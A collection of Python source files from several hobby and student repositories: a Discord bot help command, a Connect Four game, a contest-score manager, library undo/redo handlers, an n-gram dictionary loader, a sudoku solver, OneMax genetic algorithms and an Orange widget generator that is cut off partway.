view.add_item(CategorySelect(f_mapping, self.context)) channel = self.get_destination() msg = await channel.send(embed=view.paginator.current(), view=view, reference=self.context.message) view.message = msg async def send_cog_help(self, cog: commands.Cog): commands = await self.filter_commands(cog.get_commands(), sort=True) view = HelpView(CogHelpPaginator(cog, commands, self.context.prefix), self.context.author) # All my homies hate Assistance # If there is >25 commands create multiple Selects and add a suffix indicating what commands are inside [A-C] if len(commands) > SELECT_MAX_VALUES: for i in range(0, 
len(commands), SELECT_MAX_VALUES - 1): view.add_item(CommandSelect(cog, commands[i:i + SELECT_MAX_VALUES - 1], self.context, suffix=f"[{commands[i].name[0].upper()}-{commands[i:i + SELECT_MAX_VALUES - 2][-1].name[0].upper()}]")) else: view.add_item(CommandSelect(cog, commands, self.context)) channel = self.get_destination() msg = await channel.send(embed=view.paginator.current(), view=view, reference=self.context.message) view.message = msg async def send_group_help(self, group: commands.Group): commands = await self.filter_commands(group.commands, sort=True) view = HelpView(CogHelpPaginator(group, commands, prefix=self.context.clean_prefix), self.context.author) view.add_item(CommandSelect(group.cog, commands, self.context)) channel = self.get_destination() msg = await channel.send(embed=view.paginator.current(), view=view, reference=self.context.message) view.message = msg async def send_command_help(self, command: commands.Command): embed = CommandHelpPaginator(command, self.context.clean_prefix).current() channel = self.get_destination() await channel.send(embed=embed, reference=self.context.message) async def send_error_message(self, error: str): embed = discord.Embed(title="Not Found", description=error, colour=self.context.bot.colour) channel = self.get_destination() await channel.send(embed=embed) ```
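`KuriHelp` only takes effect once it replaces the bot's default help command. That hook lives outside this file, but by discord.py convention it would look roughly like the sketch below; the bot construction and prefix are assumptions, only the `utils.help` import path comes from this entry:
```python
# Hypothetical wiring sketch -- the host module is not shown in this entry.
import discord
from discord.ext import commands
from utils.help import KuriHelp

intents = discord.Intents.all()
bot = commands.Bot(command_prefix='.', intents=intents)
bot.help_command = KuriHelp()  # swaps out the plain default help command
```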
{ "source": "916-Maria-Popescu/Fundamental-of-Programming", "score": 4 }
#### File: Fundamental-of-Programming/HW11 - Connect Four Game/ConsoleUI.py ```python import random """ Connect Four is a two-player connection board game, in which the players choose a color and then take turns dropping colored discs into a seven-column, six-row vertically suspended grid. The pieces fall straight down, occupying the lowest available space within the column. The objective of the game is to be the first to form a horizontal, vertical, or diagonal line of four of one's own discs. """ class Console: def __init__(self, service): self.__service = service def run_console(self): # ---------------------------------------------------------Options print("Welcome to the game") option = input("How do you want to play?\n" " 1 -> player vs player\n" " 2 -> Player vs computer\n" " my option:") name1 = input("Player 1, please enter your name: ") if option == '1': # Player versus player game: name2 = input("Player 2, please enter your name: ") print(name1, " and ", name2, "you'll play against each other") elif option == '2': # Player versus computer game: print(name1, "you'll play against the Computer") name2 = 'Computer' else: print("sorry! wrong option!") return print(self.__service.flip_board()) # ------------------------------------------------------------------SetUp stop_the_game = False turn = 0 # turn 0 for player1 and turn 1 for player2/computer # --------------------------------------------------------------------the game while stop_the_game is False: if turn == 0: # Player 1 move: piece = 1 while True: move = int(input(name1 + ", what column do you choose? : ")) - 1 if self.__service.validate_move(move): self.__service.implement_move(move, piece) print(self.__service.flip_board()) break else: print("That column is already full!") if self.__service.check_win(piece): stop_the_game = True print("Congrats!!!", name1, "you are the winner!") else: piece = 2 # Player 2 or Computer if option == '1': # Player 2 move: while True: move = int(input(name2 + ", what column do you choose? : ")) - 1 if self.__service.validate_move(move): self.__service.implement_move(move, piece) print(self.__service.flip_board()) break else: print("That column is already full!") if self.__service.check_win(piece): stop_the_game = True print("Congrats!!!", name2, "you are the winner!") else: # Computer move: while True: move = random.randint(0, 6) if self.__service.validate_move(move): self.__service.implement_move(move, piece) print("Computer move: ", move + 1) print(self.__service.flip_board()) break if self.__service.check_win(piece): stop_the_game = True print(name1, "you are the loser!") turn = turn + 1 turn = turn % 2 ``` #### File: Fundamental-of-Programming/HW3 - Contest Data Base/main.py ```python def get(list, position): """ The function will extract a certain element from a list.""" return list[int(position)] def set(list, element, position): """ The function will set a certain element from a list.
:param list: [ ['2', '4', '8'], ['3', '5', '6'], ['10', '4', '6'], ['9', '3', '2'], ['10', '10', '10'] ] :param element: ['5', '8', '9'] :param position: 1 :return: [ ['2', '4', '8'], ['5', '8', '9'], ['10', '4', '6'], ['9', '3', '2'], ['10', '10', '10'] ] """ list.insert(int(position), element) list.remove(get(list, int(position) + 1)) def make_a_list(sentence): """ The function will make a list containing the given scores P1, P2 and P3 that are found in the command.""" list_one_score = [] for i in range(1, 4): list_one_score.append(sentence[i]) return list_one_score def add_scores(list, sentence): """ The function will add to the principal list (with all the scores of all the participants) a list with the scores of just one participant. """ list.append(make_a_list(sentence)) def insert_scores(list, sentence, position): """ The function will insert in a given position to the principal list (with all the scores of all the participants) a list with the scores of just one participant """ list.insert(int(position), make_a_list(sentence)) def remove_one_part(list, position): """ The function will set the scores of the participant at a given position to 0. So that, the participant <position> score P1=P2=P3= 0. """ nul_element = ['0', '0', '0'] set(list, nul_element, position) def remove_more_part(list, first_position, last_position): """ The function will set the scores of all the participants between the first position and last position to 0. For all the participants between <first_position> and <last_position>, P1=P2=P3= 0 """ nul_element = ['0', '0', '0'] for i in range(int(first_position), int(last_position) + 1): set(list, nul_element, i) def remove(list, cmd): if len(cmd) == 2: # The command is remove <position> remove_one_part(list, get(cmd, 1)) elif len(cmd) == 4: # The command is remove <first pos> to <last pos> remove_more_part(list, get(cmd, 1), get(cmd, 3)) def replace(list, problem, new_score): """ The function will replace a score obtained by a participant at a specific problem with a new score. List represents the list with the scores of a participant, where <problem> ( P1/P2/P3 ) will receive a new score """ set(list, new_score, int(problem[1]) - 1) def calc_average(list): """ The function will calculate the average of all the integers from a list ( it will calculate the sum of all the integers, and then it will divide the sum by the value of the len of the list) :param list: [ '2', '4', '3' ] :return: 3 """ result = 0 for i in range(0, len(list)): result = result + int(get(list, i)) return result / len(list) def average_score_lesser(list, number): """ The function will display all the participants with an average score lesser than the given number. :param list: [['5', '8', '9'], ['10', '4', '6'], ['9', '3', '2'], ['10', '10', '10'], ['7', '8', '9']] :param number: 7 :return: ['10', '4', '6'], ['9', '3', '2'] """ l = [] # l is the required list for i in range(0, len(list)): if calc_average(get(list, i)) < number: l.append(get(list, i)) return l def average_score_equal(list, number): """ The function will display all the participants with an average score equal with the given number.
:param list: [['5', '8', '9'], ['10', '4', '6'], ['9', '3', '2'], ['10', '10', '10'], ['7', '8', '9']] :param number: 8 :return:['7', '8', '9'] """ l = [] # l is the required list for i in range(0, len(list)): if calc_average(get(list, i)) == number: l.append(get(list, i)) return l def average_score_greater(list, number): """ The function will return a list with all the participants with an average score greater than the given number. :param list: [['10', '4', '6'], ['9', '3', '2'], ['10', '10', '10'], ['7', '8', '9']] :param number: 7 :return: [['10', '10', '10'], ['7', '8', '9']] """ l = [] # l is the required list for i in range(0, len(list)): if calc_average(get(list, i)) > number: l.append(get(list, i)) return l def list_sorted(list): """ The function will return a list with participants sorted in decreasing order of average score :param list: [['5', '8', '9'], ['10', '4', '6'], ['10', '10', '10'], ['7', '8', '9'], ['10', '2', '9']] :return: [['10', '10', '10'], , ['7', '8', '9'], ['5', '8', '9'], ['10', '2', '9'], ['10', '4', '6']] """ l = [] for i in range(0, len(list)): get(list, i).insert(0, calc_average(get(list, i))) l.append(get(list, i)) l.sort(reverse=True) for i in range(0, len(l)): get(l, i) get(l, i).remove(get(get(l, i), 0)) return l def list(list, cmd): if len(cmd) == 1: l = list elif get(cmd, 1) == 'sorted': l = list_sorted(list) elif get(cmd, 1) == '<': l = average_score_lesser(list, int(get(cmd, 2))) elif get(cmd, 1) == '=': l = average_score_equal(list, int(get(cmd, 2))) elif get(cmd, 1) == '>': l = average_score_greater(list, int(get(cmd, 2))) print(l) def print_menu(): commands = ['add <P1 score> <P2 score> <P3 score>', 'insert <P1 score> <P2 score> <P3 score> at <position>', 'remove <position>', 'remove <start position> to <end position>', 'replace <position> <P1 | P2 | P3> with <new score>', 'list', 'list sorted', 'list [< | = | >] <score>'] print("The possible comands are:") print(*commands, sep="\n") def run_menu(): list_participants_scores = [['5', '8', '9'], ['10', '4', '6'], ['9', '3', '2'], ['10', '10', '10'], ['7', '8', '9'], ['8', '9', '10'], ['10', '2', '9'], ['2', '4', '6'], ['8', '2', '1'], ['0', '8', '4']] commands = ['add <P1 score> <P2 score> <P3 score>', 'insert <P1 score> <P2 score> <P3 score> at <position>', 'remove <position>', 'remove <start position> to <end position>', 'replace <position> <P1 | P2 | P3> with <new score>', 'list', 'list sorted', 'list [< | = | >] <score>'] while True: comand = input() comand_splited = comand.split() first_word = get(comand_splited, 0) if first_word == 'add': # The command is add P1, P2, P3 add_scores(list_participants_scores, comand_splited) elif first_word == 'insert': # The command is insert [P1, P2, P3] at position insert_scores(list_participants_scores, comand_splited, comand_splited[5]) elif first_word == 'remove': remove(list_participants_scores, comand_splited) elif first_word == 'replace': # The command is replace <old score> P1/P2/P3 with <new score> replace(get(list_participants_scores, int(get(comand_splited, 1))), get(comand_splited, 2), (get(comand_splited, 4))) elif first_word == 'list': (list(list_participants_scores, comand_splited)) else: print("Wrong command") break if __name__ == '__main__': print_menu() run_menu() ``` #### File: HW6789 - Library Data Base/Service/UndoRedoHandler.py ```python from enum import Enum from Service.ServiceUndoRedo import RedoService, UndoService # -----------------------------------------------------------------------------------------BOOK def 
undo_add_book(service_book, id_book): title = service_book.find_by_id(id_book).get_title() # for redo author = service_book.find_by_id(id_book).get_author() # for redo service_book.remove_book(id_book) RedoService.store_operation(service_book, RedoHandler.ADD_BOOK, id_book, title, author) def undo_remove_book(service_book, id_book, title, author): service_book.add_book(id_book, title, author) RedoService.store_operation(service_book, RedoHandler.REMOVE_BOOK, id_book) def undo_update_book(service_book, id_book, old_title, old_author): new_title = service_book.find_by_id(id_book).get_title # for redo new_author = service_book.find_by_id(id_book).get_author # for redo service_book.find_by_id(id_book).set_title(old_title) service_book.find_by_id(id_book).set_author(old_author) RedoService.store_operation(service_book, RedoHandler.UPDATE_BOOK, id_book, new_title, new_author) # ------------------------------------------------------------------------------------------CLIENT def undo_add_client(service_client, id_client): name = service_client.find_by_id(id_client).get_name() service_client.remove_client(id_client) RedoService.store_operation(service_client, RedoHandler.ADD_CLIENT, id_client, name) def undo_remove_client(service_client, id_client, name): service_client.add_client(id_client, name) RedoService.store_operation(service_client, RedoHandler.REMOVE_CLIENT, id_client) def undo_update_client(service_client, id_client, old_name): new_name = service_client.find_by_id(id_client).get_name() # for redo service_client.find_by_id(id_client).set_name(old_name) RedoService.store_operation(service_client, RedoHandler.UPDATE_CLIENT, id_client, new_name) # ---------------------------------------------------------------------------------------RENTAL def undo_rent_book(service_rental, id_rental): id_book = service_rental.find_by_id(id_rental).get_id_book() # for redo id_client = service_rental.find_by_id(id_rental).get_id_client() # fore redo rented_date = service_rental.find_by_id(id_rental).get_rented_date() # for redo service_rental.remove_rental(id_rental) RedoService.store_operation(service_rental, RedoHandler.RENT_BOOK, id_rental, id_book, id_client, rented_date) def undo_return_book(service_rental, id_rental): returned_date = service_rental.find_by_id(id_rental).get_returned_date() service_rental.find_by_id(id_rental).set_returned_date('-') RedoService.store_operation(service_rental, RedoHandler.RETURN_BOOK, id_rental, returned_date) # ---------UNDO HANDLER CLASS class UndoHandler(Enum): ADD_BOOK = undo_add_book REMOVE_BOOK = undo_remove_book UPDATE_BOOK = undo_update_book ADD_CLIENT = undo_add_client REMOVE_CLIENT = undo_remove_client UPDATE_CLIENT = undo_update_client RENT_BOOK = undo_rent_book RETURN_BOOK = undo_return_book # -----------------------------------------------------------------------------------BOOK def redo_add_book(service_book, id_book, title, author): service_book.add_book(id_book, title, author) UndoService.store_operation(service_book, UndoHandler.ADD_BOOK, id_book) def redo_remove_book(service_book, id_book): title = service_book.find_by_id(id_book).get_title() author = service_book.find_by_id(id_book).get_author() service_book.remove_book(id_book) UndoService.store_operation(service_book, UndoHandler.REMOVE_BOOK, id_book, title, author) def redo_update_book(service_book, id_book, title, author): old_title = service_book.find_by_id(id_book).get_title() old_author = service_book.find_by_id(id_book).get_author() service_book.find_by_id(id_book).set_title(title) 
service_book.find_by_id(id_book).set_author(author) UndoService.store_operation(service_book, UndoHandler.UPDATE_BOOK, id_book, old_title, old_author) # --------------------------------------------------------------------------------------CLIENT def redo_add_client(service_client, id_client, name): service_client.add_client(id_client, name) UndoService.store_operation(service_client, UndoHandler.ADD_CLIENT, id_client) def redo_remove_client(service_client, id_client): name = service_client.find_by_id(id_client).get_name() service_client.remove_client(id_client) UndoService.store_operation(service_client, UndoHandler.REMOVE_CLIENT, id_client, name) def redo_update_client(service_client, id_client, name): old_name = service_client.find_by_id(id_client).get_name() service_client.find_by_id(id_client).set_name(name) UndoService.store_operation(service_client, UndoHandler.UPDATE_CLIENT, id_client, old_name) # ---------------------------------------------------------------------------------------RENTAL def redo_rent_book(service_rental, id_rental, id_book, id_client, rented_date): service_rental.add_rental(id_rental, id_book, id_client, rented_date, '-') UndoService.store_operation(service_rental, UndoHandler.RENT_BOOK, id_rental) def redo_return_book(service_rental, id_rental, returned_date): service_rental.find_by_id(id_rental).set_returned_date(returned_date) UndoService.store_operation(service_rental, UndoHandler.RETURN_BOOK, id_rental) # -----------------------------------------------------------------------------------CLIENT class RedoHandler(Enum): ADD_BOOK = redo_add_book REMOVE_BOOK = redo_remove_book UPDATE_BOOK = redo_update_book ADD_CLIENT = redo_add_client REMOVE_CLIENT = redo_remove_client UPDATE_CLIENT = redo_update_client RENT_BOOK = redo_rent_book RETURN_BOOK = redo_return_book ```
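Each `undo_*` function above performs the inverse operation and then registers the matching redo entry with the opposite service, so the undo and redo histories mirror each other. Below is a stripped-down sketch of that mirrored-stack pattern; the `UndoRedo` class and the toy `books` store are hypothetical and not taken from the project.

```python
# Minimal sketch of mirrored undo/redo stacks, assuming each action is
# recorded together with its inverse (as the handlers above do).
class UndoRedo:
    def __init__(self):
        self._undo, self._redo = [], []

    def record(self, do, undo):
        """Register an already-performed action together with its inverse."""
        self._undo.append((do, undo))
        self._redo.clear()  # a fresh action invalidates the redo history

    def undo(self):
        do, undo = self._undo.pop()
        undo()
        self._redo.append((do, undo))

    def redo(self):
        do, undo = self._redo.pop()
        do()
        self._undo.append((do, undo))

books = {}
def add(): books["1"] = "Moby Dick"
def remove(): books.pop("1")

h = UndoRedo()
add(); h.record(add, remove)
h.undo(); assert "1" not in books
h.redo(); assert books["1"] == "Moby Dick"
```

Clearing the redo stack on every new action is one common design choice; the handler enums above instead re-register operations explicitly on each undo/redo, which achieves the same pairing.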
{ "source": "9173860/WMSeg", "score": 3 }
#### File: WMSeg/pytorch_pretrained_zen/ngram_utils.py ```python import os import logging NGRAM_DICT_NAME = 'ngram.txt' logger = logging.getLogger(__name__) class ZenNgramDict(object): """ Dict class to store the ngram """ def __init__(self, ngram_freq_path, tokenizer, max_ngram_in_seq=128): """Constructs ZenNgramDict :param ngram_freq_path: ngrams with frequency """ if os.path.isdir(ngram_freq_path): ngram_freq_path = os.path.join(ngram_freq_path, NGRAM_DICT_NAME) self.ngram_freq_path = ngram_freq_path self.max_ngram_in_seq = max_ngram_in_seq self.id_to_ngram_list = ["[pad]"] self.ngram_to_id_dict = {"[pad]": 0} self.ngram_to_freq_dict = {} logger.info("loading ngram frequency file {}".format(ngram_freq_path)) with open(ngram_freq_path, "r", encoding="utf-8") as fin: for i, line in enumerate(fin): ngram,freq = line.split(",") tokens = tuple(tokenizer.tokenize(ngram)) self.ngram_to_freq_dict[ngram] = freq self.id_to_ngram_list.append(tokens) self.ngram_to_id_dict[tokens] = i + 1 def save(self, ngram_freq_path): with open(ngram_freq_path, "w", encoding="utf-8") as fout: for ngram,freq in self.ngram_to_freq_dict.items(): fout.write("{},{}\n".format(ngram, freq)) ```
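`ZenNgramDict` expects a plain-text file with one `ngram,frequency` pair per line and keys its id map by the tuple of tokenized pieces. The sketch below shows that file format and lookup flow under stated assumptions: `CharTokenizer` is a trivial stand-in for the real BERT-style tokenizer, and the sample n-grams are invented for illustration.

```python
# Sketch of the "ngram,freq" format consumed above, with a character
# tokenizer standing in for the real tokenizer.
import os
import tempfile

class CharTokenizer:  # hypothetical stand-in
    def tokenize(self, text):
        return list(text)

path = os.path.join(tempfile.mkdtemp(), "ngram.txt")
with open(path, "w", encoding="utf-8") as f:
    f.write("北京,1204\n上海,987\n")

id_to_ngram = ["[pad]"]          # id 0 is reserved for padding
ngram_to_id = {"[pad]": 0}
tok = CharTokenizer()
with open(path, encoding="utf-8") as f:
    for i, line in enumerate(f):
        ngram, freq = line.strip().split(",")
        tokens = tuple(tok.tokenize(ngram))  # keyed by token tuple, as above
        id_to_ngram.append(tokens)
        ngram_to_id[tokens] = i + 1

print(ngram_to_id[("北", "京")])  # -> 1
```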
{ "source": "91884227/37Sudoku-Solver", "score": 3 }
#### File: 37Sudoku-Solver/MYsudoku/sudoku.py ```python import numpy as np import pandas as pd from IPython.display import display, HTML import matplotlib.pyplot as plt # In[3]: class Solution(): def __init__(self, question_): self.question = question_ self.board = question_ self.find_blank_position() # some control signals needed in sol self.blank_position_index = 0 self.stop_signal = False # record answer self.answer = [] def find_blank_position(self): blank_position = [] for row in range(9): for col in range(9): if( self.question[row][col] == "" ): blank_position = blank_position + [(row, col)] self.blank_position = blank_position def draw(self): col = row = 9 matrix = np.array(self.board) df = pd.DataFrame(matrix) plt.figure(1, figsize=(5, 5)) tb = plt.table(cellText=matrix, loc=(0,0), cellLoc='center') tc = tb.properties()['child_artists'] for cell in tc: cell.set_height(1.0/row) cell.set_width(1.0/col) ax = plt.gca() ax.set_xticks([]) ax.set_yticks([]) plt.show() def find_candidate(self, row, col): row_element = self.board[row] col_element = [row[col] for row in self.board] buf = np.array(self.board)[row//3*3 : row//3*3+3 , col//3*3 : col//3*3+3] block_element = buf.flatten().tolist() buf_1 = ["1", "2", "3", "4", "5", "6", "7", "8", "9", ""] buf_2 = set(row_element + col_element + block_element) possible_element = list(set(buf_1) - set(buf_2)) possible_element.sort() return(possible_element) def sol(self, draw_ = False): if( self.blank_position_index == len(self.blank_position)): self.stop_signal = True ##!! a list cannot be copied directly self.answer = np.array(self.board) else: row, col = self.blank_position[self.blank_position_index] self.blank_position_index = self.blank_position_index + 1 for fill_in in self.find_candidate(row, col): self.board[row][col] = fill_in if( draw_ ): self.draw() self.sol(draw_) if( self.stop_signal): break self.board[row][col] = "" self.blank_position_index = self.blank_position_index - 1 ```
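The backtracking in `sol` relies on `find_candidate`, which keeps only the digits not already present in the cell's row, column, and 3x3 block. A self-contained sketch of that elimination rule, with a hypothetical `candidates` helper:

```python
# A digit is a legal candidate iff it does not already occur in the
# cell's row, column, or 3x3 block (the rule find_candidate implements).
def candidates(board, row, col):
    row_vals = set(board[row])
    col_vals = {board[r][col] for r in range(9)}
    r0, c0 = row // 3 * 3, col // 3 * 3
    block_vals = {board[r][c] for r in range(r0, r0 + 3) for c in range(c0, c0 + 3)}
    return sorted(set("123456789") - row_vals - col_vals - block_vals)

board = [[""] * 9 for _ in range(9)]
board[0] = list("12345678") + [""]
print(candidates(board, 0, 8))  # -> ['9']
```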
{ "source": "91884227/OneMax-problem", "score": 2 }
#### File: OneMax-problem/myGA/GA.py ```python import numpy as np import matplotlib.pyplot as plt from tqdm import tnrange, tqdm_notebook # In[2]: class Roulette_GA(): def __init__(self, generations_ = 200): # initial parent: buf = np.random.randint(2, size = 60*500) self.parent_list = np.resize(buf, (500,60)) self.chance_prop = [] self.generations = generations_ self.simulation_result = [] def crossover(self, parent_1_, parent_2_): parent_len = len(parent_1_) ranfom_position = np.random.choice(parent_len, 1)[0] if( ranfom_position > parent_len/2 ): children_1 = np.hstack((parent_1_[:ranfom_position], parent_2_[ranfom_position:])) children_2 = np.hstack((parent_2_[:ranfom_position], parent_1_[ranfom_position:])) else : children_1 = np.hstack((parent_2_[:ranfom_position], parent_1_[ranfom_position:])) children_2 = np.hstack((parent_1_[:ranfom_position], parent_2_[ranfom_position:])) return( (children_1, children_2)) def Fitness(self, parent_): return( sum(parent_) ) def Roulette(self): buf = list(map(self.Fitness, self.parent_list)) self.chance_prop = np.asarray(buf)/sum(buf) def Recombination_2(self, _): buf = np.arange( len(self.parent_list) ) select_index = np.random.choice( buf, 2, p = self.chance_prop, replace = False) parent_1 = self.parent_list[ select_index[0] ] parent_2 = self.parent_list[ select_index[1] ] return( self.crossover( parent_1, parent_2) ) def Recombination_all(self): parent_list_len = len(self.parent_list) one_parent_len = len(self.parent_list[0]) buf = list(map(self.Recombination_2, np.arange( parent_list_len/2 ))) self.parent_list = np.reshape(np.asarray(buf), ( parent_list_len, one_parent_len)) def oneRound(self): self.Roulette() self.Recombination_all() max_fitness = max(list(map(self.Fitness, self.parent_list))) # print("max score: %d" % max(list(map(self.Fitness, self.parent_list)))) return( max_fitness ) def draw_plot(self): buf = np.array(self.simulation_result) buf = np.mean(buf, axis=0) print("average of the best fitness values: %.2f" % buf[-1]) plt.plot(buf) plt.ylabel('Fitness') plt.show() def simulation_one(self, generations = 200): buf = [] for i in range(generations) : buf = buf + [self.oneRound()] self.simulation_result.append( buf ) def __call__(self, simulation_times): for i in tqdm_notebook( range(simulation_times) ): self.simulation_one(self.generations) self.draw_plot() # In[5]: class Tournament_GA(Roulette_GA): def Recombination_2(self, _): buf = np.arange( len(self.parent_list) ) select_index_list_1 = np.random.choice( buf, 2, replace = False) select_index_1 = max(select_index_list_1, key = lambda k: self.Fitness(self.parent_list[ k])) select_index_list_2 = np.random.choice( buf, 2, replace = False) select_index_2 = max(select_index_list_2, key = lambda k: self.Fitness(self.parent_list[ k])) select_index = [select_index_1, select_index_2] parent_1 = self.parent_list[ select_index[0] ] parent_2 = self.parent_list[ select_index[1] ] return( self.crossover( parent_1, parent_2) ) # In[6]: class Q4(Roulette_GA): def Fitness(self, parent_): return( sum(parent_) + 800 ) # In[7]: class Q7(Tournament_GA): def Fitness(self, parent_): return( sum(parent_) + 800 ) ```
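In `Roulette_GA`, `Roulette` normalizes the population's fitness values into selection probabilities and `Recombination_2` then draws two distinct parents weighted by them. The sketch below shows that fitness-proportional (roulette-wheel) selection plus one-point crossover on a toy OneMax population; it is an illustration, not the class's exact flow, and the fixed seed is chosen only to make it reproducible.

```python
# Roulette-wheel selection with one-point crossover on a toy population.
import numpy as np

rng = np.random.default_rng(0)
population = rng.integers(2, size=(6, 8))   # 6 parents, 8-bit genomes
fitness = population.sum(axis=1)            # OneMax fitness = number of ones
probs = fitness / fitness.sum()             # normalized selection weights

i, j = rng.choice(len(population), size=2, replace=False, p=probs)
cut = rng.integers(1, population.shape[1])  # one-point crossover position
child = np.concatenate([population[i][:cut], population[j][cut:]])
print(fitness, (i, j), child)
```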
{ "source": "91902078/XOPPY", "score": 3 }
#### File: devel/glossary/create_widget_glossary.py ```python import sys import os import re #def read_json(json_name): # json_text = open(json_name).read() # json_dict = eval(json_text) # json = sorted(json_dict.items(), # key=lambda x: json_text.index('"{}"'.format(x[0]))) # #print(json) # #json_lowercase = dict((k.lower(), v) for k, v in json.iteritems()) # json_lowercase = json # return json_lowercase re_dict_entry = re.compile(r'"(?P<name>.*?)"\s*:') def read_json(json_name): json_text = open(json_name).read() key_order = [mo.group('name') for mo in re_dict_entry.finditer(json_text)] json_dict = eval(json_text) json = sorted(json_dict.items(), key=lambda x: key_order.index(x[0])) #print(json) #json_lowercase = dict((k.lower(), v) for k, v in json.iteritems()) json_lowercase = json return json_lowercase if __name__ == "__main__": a = read_json("IC_Lens.json") for i,j in a: print("--- %s %s "%(i,j)) b = read_json("BC_PerfectCrystal.json") for i,j in b: print("--- %s %s "%(i,j)) #def create_flags(json): # flags = '["True", "True", "True", "self.RB_CHOICE == 0", "self.RB_CHOICE == 1"]' # return flags # #def create_labels(json): # labels = '["Electron energy [GeV]","Electron current [A]","B from","Magnetic radius [m]","Magnetic field [T]"]' # return labels def create_settings(json): settings = "" for name, value in json: if name[:2] != "__": if isinstance(value, str): settings += ' {} = Setting("{}")\n'.format(name, value) elif isinstance(value, list): settings += ' {} = Setting({})\n'.format(name, value[0]) else: settings += ' {} = Setting({})\n'.format(name, value) return settings def create_calc_args_default(json): settings = "" i = -1 for name, value in json: i += 1 if isinstance(value, str): settings += '{}="{}"'.format(name, value).rstrip('\n') elif isinstance(value, list): settings += '{}={}'.format(name, value[0]).rstrip('\n') else: settings += '{}={}\n'.format(name, value).rstrip('\n') if i < (len(json)-1): settings += ',' return settings def create_calc_args(json): calc_args = "" i = -1 for name, value in json: i += 1 calc_args += '{}=self.{}'.format(name, name) if i < (len(json)-1): calc_args += ',' return calc_args def create_controls(json): controls = "" controls += ' box0 = gui.widgetBox(self.controlArea, " ",orientation="horizontal") \n' controls += ' #widget buttons: compute, set defaults, help\n' controls += ' gui.button(box0, self, "Compute", callback=self.compute)\n' controls += ' gui.button(box0, self, "Defaults", callback=self.defaults)\n' controls += ' gui.button(box0, self, "Help", callback=self.help1)\n' controls += ' self.process_showers()\n' controls += ' box = gui.widgetBox(self.controlArea, " ",orientation="vertical") \n' idx = -1 #controls += ' box = gui.widgetBox(self.controlArea, "Set parameters") \n' #controls += ' box = gui.widgetBox(self.controlArea, " ") \n' controls += ' \n' controls += ' \n' controls += ' idx = -1 \n' for name, value in json: if name[:2] != "__": idx += 1 controls += ' \n' controls += ' #widget index '+str(idx)+' \n' controls += ' idx += 1 \n' controls += ' box1 = gui.widgetBox(box) \n' if isinstance(value, list): controls += list_template.format(name=name,values=str(value[1:])) else: controls += line_edit_templates[type(value)].format(name=name) controls += ' self.show_at(self.unitFlags()[idx], box1) \n' return controls def main(): json_name = sys.argv[1] base = os.path.splitext(json_name)[0] py_name = base + ".py" calc_name = "bl_glossary_template.py" if os.path.exists(py_name): print("file overwritten: "+py_name+"\n") else: 
print("file written: "+py_name+"\n") if os.path.exists(calc_name): print("appended to file: "+calc_name+"\n") json = read_json(json_name) widget_name = base widget_class_name = widget_id_name = base.replace(" ", "") settings = create_settings(json) controls = create_controls(json) calc_args = create_calc_args(json) calc_args_default = create_calc_args_default(json) dir(json) labels = None flags = None name = None kk = 0 for i,j in json: if i == "__labels": labels = j print("> %d labels found. \n "%(len(labels))) elif i == "__flags": flags = j print("> %d flags found. \n "%(len(flags))) elif i == "__name": name = j print("> found name %s: \n "%(name)) else: if i[:2] != "__": kk += 1 print("> found entry number %d: %s \n "%(kk,i)) print("> found entries (without __) %d: \n "%(kk)) open(py_name, "wt").write(widget_template.format_map(vars())) #open(calc_name, "a").write(calc_template.format_map(vars())) control_template = """ gui.{}(box1, self, "{{name}}", label=self.unitLabels()[idx], addSpace=True""" str_template = control_template.format("lineEdit") + ")\n" int_template = control_template.format("lineEdit") + """, valueType=int, validator=QIntValidator()) """ float_template = control_template.format("lineEdit") + """, valueType=float, validator=QDoubleValidator()) """ line_edit_templates = {str: str_template, int: int_template, float: float_template} list_template = control_template.format("comboBox") + """, items={values}, valueType=list, orientation="horizontal") """ widget_template = """import sys from PyQt4.QtGui import QIntValidator, QDoubleValidator, QApplication, QSizePolicy import numpy as np from orangewidget import gui from orangewidget.settings import Setting from oasys.widgets import widget #try: # from ..tools.xoppy_calc import xoppy_doc #except ImportError: # print("Error importing: xoppy_doc") # raise #try: # from ..tools.xoppy_calc import xoppy_calc_{widget_class_name} #except ImportError: # print("compute pressed.") # print("Error importing: xoppy_calc_{widget_class_name}") # raise class OW{widget_class_name}(widget.OWWidget): name = "{widget_name}" id = "orange.widgets.data{widget_id_name}" description = "xoppy application to compute..." icon = "icons/xoppy_{widget_class_name}.png" author = "create_widget.py" maintainer_email = "<EMAIL>" priority = 10 category = "" keywords = ["xoppy", "{widget_class_name}"] outputs = [{{"name": "xoppy_data", "type": np.ndarray, "doc": ""}}, {{"name": "xoppy_specfile", "type": str, "doc": ""}}] #inputs = [{{"name": "Name", # "type": type, # "handler": None, # "doc": ""}}] want_main_area = False {settings} def __init__(self): super().__init__() {controls} self.process_showers() gui.rubber(self.controlArea) def unitLabels(self): return {labels} def unitFlags(self): return {flags} def compute(self): print("compute executed.") #table = Table.from_numpy(domain, out) #self.send("xoppy_table",table) def defaults(self): self.resetSettings() self.compute() return def help1(self): print("help pressed.") #xoppy_doc('{widget_class_name}') if __name__ == "__main__": app = QApplication(sys.argv) w = OW{widget_class_name}() w.show() app.exec() w.saveSettings() """ calc_template = """ def xoppy_calc_{widget_class_name}({calc_args_default}): print("Inside xoppy_calc_{widget_class_name}. 
") return(None) """ main() ``` #### File: devel/glossary/IC_PhotonBeamPencil.py ```python import sys from PyQt4.QtGui import QIntValidator, QDoubleValidator, QApplication, QSizePolicy from Orange.widgets import widget, gui from Orange.widgets.settings import Setting from Orange.data import Table, Domain, ContinuousVariable import numpy as np #try: # from ..tools.xoppy_calc import xoppy_doc #except ImportError: # print("Error importing: xoppy_doc") # raise #try: # from ..tools.xoppy_calc import xoppy_calc_IC_PhotonBeamPencil #except ImportError: # print("compute pressed.") # print("Error importing: xoppy_calc_IC_PhotonBeamPencil") # raise class OWIC_PhotonBeamPencil(widget.OWWidget): name = "IC_PhotonBeamPencil" id = "orange.widgets.dataIC_PhotonBeamPencil" description = "xoppy application to compute..." icon = "icons/xoppy_IC_PhotonBeamPencil.png" author = "create_widget.py" maintainer_email = "<EMAIL>" priority = 10 category = "" keywords = ["xoppy", "IC_PhotonBeamPencil"] outputs = [#{"name": "xoppy_data", # "type": np.ndarray, # "doc": ""}, {"name": "xoppy_table", "type": Table, "doc": ""}, {"name": "xoppy_specfile", "type": str, "doc": ""}] #inputs = [{"name": "Name", # "type": type, # "handler": None, # "doc": ""}] want_main_area = False energyMin = Setting(1000.0) energyMax = Setting(100000.0) def __init__(self): super().__init__() box0 = gui.widgetBox(self.controlArea, " ",orientation="horizontal") #widget buttons: compute, set defaults, help gui.button(box0, self, "Compute", 